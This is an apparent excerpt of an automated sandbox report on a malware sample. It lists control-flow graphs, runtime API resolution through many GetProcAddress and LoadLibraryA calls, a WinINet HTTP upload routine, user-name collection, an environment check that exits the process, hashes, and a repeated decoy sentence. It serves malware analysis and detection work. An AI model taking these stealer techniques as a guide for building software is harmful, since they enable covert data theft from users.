                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                      • API String ID: 2127927946-2218711628
                                      • Opcode ID: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                                      • Instruction ID: 5e1cd967cc1bd71f365b3ff5871be6e8d111942329c8327febd6a33c3aeace51
                                      • Opcode Fuzzy Hash: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                                      • Instruction Fuzzy Hash: 5841BD79740624EBC718AFE5EC8DB987F70AB4C712BA0C062F90296190C7F9D5019B3D

                                      Control-flow Graph

                                      control_flow_graph 665 419860-419874 call 419750 668 419a93-419af2 LoadLibraryA * 5 665->668 669 41987a-419a8e call 419780 GetProcAddress * 21 665->669 671 419af4-419b08 GetProcAddress 668->671 672 419b0d-419b14 668->672 669->668 671->672 674 419b46-419b4d 672->674 675 419b16-419b41 GetProcAddress * 2 672->675 676 419b68-419b6f 674->676 677 419b4f-419b63 GetProcAddress 674->677 675->674 678 419b71-419b84 GetProcAddress 676->678 679 419b89-419b90 676->679 677->676 678->679 680 419bc1-419bc2 679->680 681 419b92-419bbc GetProcAddress * 2 679->681 681->680
                                      APIs
                                      • GetProcAddress.KERNEL32(74DD0000,00878BE8), ref: 004198A1
                                      • GetProcAddress.KERNEL32(74DD0000,00878C90), ref: 004198BA
                                      • GetProcAddress.KERNEL32(74DD0000,00878C00), ref: 004198D2
                                      • GetProcAddress.KERNEL32(74DD0000,00878C18), ref: 004198EA
                                      • GetProcAddress.KERNEL32(74DD0000,00878C30), ref: 00419903
                                      • GetProcAddress.KERNEL32(74DD0000,008785A0), ref: 0041991B
                                      • GetProcAddress.KERNEL32(74DD0000,00873288), ref: 00419933
                                      • GetProcAddress.KERNEL32(74DD0000,00873228), ref: 0041994C
                                      • GetProcAddress.KERNEL32(74DD0000,00878C60), ref: 00419964
                                      • GetProcAddress.KERNEL32(74DD0000,00878C78), ref: 0041997C
                                      • GetProcAddress.KERNEL32(74DD0000,00879DD8), ref: 00419995
                                      • GetProcAddress.KERNEL32(74DD0000,00879FE8), ref: 004199AD
                                      • GetProcAddress.KERNEL32(74DD0000,00873008), ref: 004199C5
                                      • GetProcAddress.KERNEL32(74DD0000,00879EB0), ref: 004199DE
                                      • GetProcAddress.KERNEL32(74DD0000,00879EC8), ref: 004199F6
                                      • GetProcAddress.KERNEL32(74DD0000,00873328), ref: 00419A0E
                                      • GetProcAddress.KERNEL32(74DD0000,00879E80), ref: 00419A27
                                      • GetProcAddress.KERNEL32(74DD0000,00879F40), ref: 00419A3F
                                      • GetProcAddress.KERNEL32(74DD0000,008730C8), ref: 00419A57
                                      • GetProcAddress.KERNEL32(74DD0000,00879FA0), ref: 00419A70
                                      • GetProcAddress.KERNEL32(74DD0000,008732E8), ref: 00419A88
                                      • LoadLibraryA.KERNEL32(00879E50,?,00416A00), ref: 00419A9A
                                      • LoadLibraryA.KERNEL32(00879E68,?,00416A00), ref: 00419AAB
                                      • LoadLibraryA.KERNEL32(00879D78,?,00416A00), ref: 00419ABD
                                      • LoadLibraryA.KERNEL32(00879DA8,?,00416A00), ref: 00419ACF
                                      • LoadLibraryA.KERNEL32(00879E38,?,00416A00), ref: 00419AE0
                                      • GetProcAddress.KERNEL32(75A70000,00879DC0), ref: 00419B02
                                      • GetProcAddress.KERNEL32(75290000,00879EE0), ref: 00419B23
                                      • GetProcAddress.KERNEL32(75290000,00879F58), ref: 00419B3B
                                      • GetProcAddress.KERNEL32(75BD0000,00879F70), ref: 00419B5D
                                      • GetProcAddress.KERNEL32(75450000,008731E8), ref: 00419B7E
                                      • GetProcAddress.KERNEL32(76E90000,008785E0), ref: 00419B9F
                                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419BB6
                                      Strings
                                      • NtQueryInformationProcess, xrefs: 00419BAA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: NtQueryInformationProcess
                                      • API String ID: 2238633743-2781105232
                                      • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                      • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                      • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                      • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                      Control-flow Graph

                                      control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                        • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                        • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                      • StrCmpCA.SHLWAPI(?,00882630), ref: 0040493A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                      • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,008825F0), ref: 00404DE8
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                      • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                      • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                      • HttpOpenRequestA.WININET(00000000,00882520,?,00881E28,00000000,00000000,00400100,00000000), ref: 00404B15
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 2402878923-2180234286
                                      • Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                      • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                      • Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                      • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocNameProcessUser
                                      • String ID:
                                      • API String ID: 1206570057-0
                                      • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                      • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                      • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                      • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                      APIs
                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                      • ExitProcess.KERNEL32 ref: 0040117E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitInfoProcessSystem
                                      • String ID:
                                      • API String ID: 752954902-0
                                      • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                      • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                      • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                      • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                      Control-flow Graph

                                      control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                      APIs
                                      • GetProcAddress.KERNEL32(74DD0000,00872FE8), ref: 00419C2D
                                      • GetProcAddress.KERNEL32(74DD0000,00873088), ref: 00419C45
                                      • GetProcAddress.KERNEL32(74DD0000,0087A048), ref: 00419C5E
                                      • GetProcAddress.KERNEL32(74DD0000,0087A090), ref: 00419C76
                                      • GetProcAddress.KERNEL32(74DD0000,0087A0A8), ref: 00419C8E
                                      • GetProcAddress.KERNEL32(74DD0000,0087A0C0), ref: 00419CA7
                                      • GetProcAddress.KERNEL32(74DD0000,0087CB30), ref: 00419CBF
                                      • GetProcAddress.KERNEL32(74DD0000,0087A030), ref: 00419CD7
                                      • GetProcAddress.KERNEL32(74DD0000,0087A018), ref: 00419CF0
                                      • GetProcAddress.KERNEL32(74DD0000,0087A060), ref: 00419D08
                                      • GetProcAddress.KERNEL32(74DD0000,0087A000), ref: 00419D20
                                      • GetProcAddress.KERNEL32(74DD0000,00873208), ref: 00419D39
                                      • GetProcAddress.KERNEL32(74DD0000,00873368), ref: 00419D51
                                      • GetProcAddress.KERNEL32(74DD0000,008732A8), ref: 00419D69
                                      • GetProcAddress.KERNEL32(74DD0000,008730A8), ref: 00419D82
                                      • GetProcAddress.KERNEL32(74DD0000,00880530), ref: 00419D9A
                                      • GetProcAddress.KERNEL32(74DD0000,00880500), ref: 00419DB2
                                      • GetProcAddress.KERNEL32(74DD0000,0087CF90), ref: 00419DCB
                                      • GetProcAddress.KERNEL32(74DD0000,00873108), ref: 00419DE3
                                      • GetProcAddress.KERNEL32(74DD0000,00880548), ref: 00419DFB
                                      • GetProcAddress.KERNEL32(74DD0000,008803B0), ref: 00419E14
                                      • GetProcAddress.KERNEL32(74DD0000,00880458), ref: 00419E2C
                                      • GetProcAddress.KERNEL32(74DD0000,00880560), ref: 00419E44
                                      • GetProcAddress.KERNEL32(74DD0000,00873188), ref: 00419E5D
                                      • GetProcAddress.KERNEL32(74DD0000,00880518), ref: 00419E75
                                      • GetProcAddress.KERNEL32(74DD0000,00880578), ref: 00419E8D
                                      • GetProcAddress.KERNEL32(74DD0000,00880290), ref: 00419EA6
                                      • GetProcAddress.KERNEL32(74DD0000,008802A8), ref: 00419EBE
                                      • GetProcAddress.KERNEL32(74DD0000,008802C0), ref: 00419ED6
                                      • GetProcAddress.KERNEL32(74DD0000,00880368), ref: 00419EEF
                                      • GetProcAddress.KERNEL32(74DD0000,008802D8), ref: 00419F07
                                      • GetProcAddress.KERNEL32(74DD0000,008804E8), ref: 00419F1F
                                      • GetProcAddress.KERNEL32(74DD0000,00880380), ref: 00419F38
                                      • GetProcAddress.KERNEL32(74DD0000,0087C658), ref: 00419F50
                                      • GetProcAddress.KERNEL32(74DD0000,00880440), ref: 00419F68
                                      • GetProcAddress.KERNEL32(74DD0000,00880350), ref: 00419F81
                                      • GetProcAddress.KERNEL32(74DD0000,00873148), ref: 00419F99
                                      • GetProcAddress.KERNEL32(74DD0000,008802F0), ref: 00419FB1
                                      • GetProcAddress.KERNEL32(74DD0000,008731A8), ref: 00419FCA
                                      • GetProcAddress.KERNEL32(74DD0000,00880398), ref: 00419FE2
                                      • GetProcAddress.KERNEL32(74DD0000,00880308), ref: 00419FFA
                                      • GetProcAddress.KERNEL32(74DD0000,00873248), ref: 0041A013
                                      • GetProcAddress.KERNEL32(74DD0000,00872E28), ref: 0041A02B
                                      • LoadLibraryA.KERNEL32(00880320,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                      • LoadLibraryA.KERNEL32(008803C8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                      • LoadLibraryA.KERNEL32(00880338,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                      • LoadLibraryA.KERNEL32(008803E0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                      • LoadLibraryA.KERNEL32(008803F8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                      • LoadLibraryA.KERNEL32(00880410,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                      • LoadLibraryA.KERNEL32(00880428,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                      • LoadLibraryA.KERNEL32(00880470,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                      • GetProcAddress.KERNEL32(75290000,00872F28), ref: 0041A0DA
                                      • GetProcAddress.KERNEL32(75290000,008804B8), ref: 0041A0F2
                                      • GetProcAddress.KERNEL32(75290000,008786C0), ref: 0041A10A
                                      • GetProcAddress.KERNEL32(75290000,00880488), ref: 0041A123
                                      • GetProcAddress.KERNEL32(75290000,00872F48), ref: 0041A13B
                                      • GetProcAddress.KERNEL32(6FC70000,0087CBD0), ref: 0041A160
                                      • GetProcAddress.KERNEL32(6FC70000,00872D48), ref: 0041A179
                                      • GetProcAddress.KERNEL32(6FC70000,0087CC20), ref: 0041A191
                                      • GetProcAddress.KERNEL32(6FC70000,008804A0), ref: 0041A1A9
                                      • GetProcAddress.KERNEL32(6FC70000,008804D0), ref: 0041A1C2
                                      • GetProcAddress.KERNEL32(6FC70000,00872EE8), ref: 0041A1DA
                                      • GetProcAddress.KERNEL32(6FC70000,00872C48), ref: 0041A1F2
                                      • GetProcAddress.KERNEL32(6FC70000,00880590), ref: 0041A20B
                                      • GetProcAddress.KERNEL32(752C0000,00872F08), ref: 0041A22C
                                      • GetProcAddress.KERNEL32(752C0000,00872E08), ref: 0041A244
                                      • GetProcAddress.KERNEL32(752C0000,00880650), ref: 0041A25D
                                      • GetProcAddress.KERNEL32(752C0000,008805A8), ref: 0041A275
                                      • GetProcAddress.KERNEL32(752C0000,00872F68), ref: 0041A28D
                                      • GetProcAddress.KERNEL32(74EC0000,0087CD60), ref: 0041A2B3
                                      • GetProcAddress.KERNEL32(74EC0000,0087CB80), ref: 0041A2CB
                                      • GetProcAddress.KERNEL32(74EC0000,00880608), ref: 0041A2E3
                                      • GetProcAddress.KERNEL32(74EC0000,00872C08), ref: 0041A2FC
                                      • GetProcAddress.KERNEL32(74EC0000,00872E48), ref: 0041A314
                                      • GetProcAddress.KERNEL32(74EC0000,0087CE78), ref: 0041A32C
                                      • GetProcAddress.KERNEL32(75BD0000,008805F0), ref: 0041A352
                                      • GetProcAddress.KERNEL32(75BD0000,00872D68), ref: 0041A36A
                                      • GetProcAddress.KERNEL32(75BD0000,00878640), ref: 0041A382
                                      • GetProcAddress.KERNEL32(75BD0000,00880620), ref: 0041A39B
                                      • GetProcAddress.KERNEL32(75BD0000,008805C0), ref: 0041A3B3
                                      • GetProcAddress.KERNEL32(75BD0000,00872E88), ref: 0041A3CB
                                      • GetProcAddress.KERNEL32(75BD0000,00872E68), ref: 0041A3E4
                                      • GetProcAddress.KERNEL32(75BD0000,00880638), ref: 0041A3FC
                                      • GetProcAddress.KERNEL32(75BD0000,008805D8), ref: 0041A414
                                      • GetProcAddress.KERNEL32(75A70000,00872EA8), ref: 0041A436
                                      • GetProcAddress.KERNEL32(75A70000,00880C80), ref: 0041A44E
                                      • GetProcAddress.KERNEL32(75A70000,00880BF0), ref: 0041A466
                                      • GetProcAddress.KERNEL32(75A70000,008809B0), ref: 0041A47F
                                      • GetProcAddress.KERNEL32(75A70000,00880C20), ref: 0041A497
                                      • GetProcAddress.KERNEL32(75450000,00872F88), ref: 0041A4B8
                                      • GetProcAddress.KERNEL32(75450000,00872EC8), ref: 0041A4D1
                                      • GetProcAddress.KERNEL32(75DA0000,00872FA8), ref: 0041A4F2
                                      • GetProcAddress.KERNEL32(75DA0000,00880B78), ref: 0041A50A
                                      • GetProcAddress.KERNEL32(6F070000,00872BC8), ref: 0041A530
                                      • GetProcAddress.KERNEL32(6F070000,00872BE8), ref: 0041A548
                                      • GetProcAddress.KERNEL32(6F070000,00872C28), ref: 0041A560
                                      • GetProcAddress.KERNEL32(6F070000,00880998), ref: 0041A579
                                      • GetProcAddress.KERNEL32(6F070000,00872C68), ref: 0041A591
                                      • GetProcAddress.KERNEL32(6F070000,00872C88), ref: 0041A5A9
                                      • GetProcAddress.KERNEL32(6F070000,00872CA8), ref: 0041A5C2
                                      • GetProcAddress.KERNEL32(6F070000,00872CC8), ref: 0041A5DA
                                      • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A5F1
                                      • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A607
                                      • GetProcAddress.KERNEL32(75AF0000,00880BD8), ref: 0041A629
                                      • GetProcAddress.KERNEL32(75AF0000,00878610), ref: 0041A641
                                      • GetProcAddress.KERNEL32(75AF0000,00880C08), ref: 0041A659
                                      • GetProcAddress.KERNEL32(75AF0000,00880A40), ref: 0041A672
                                      • GetProcAddress.KERNEL32(75D90000,00872CE8), ref: 0041A693
                                      • GetProcAddress.KERNEL32(6E380000,00880BA8), ref: 0041A6B4
                                      • GetProcAddress.KERNEL32(6E380000,00872D08), ref: 0041A6CD
                                      • GetProcAddress.KERNEL32(6E380000,00880B48), ref: 0041A6E5
                                      • GetProcAddress.KERNEL32(6E380000,00880BC0), ref: 0041A6FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
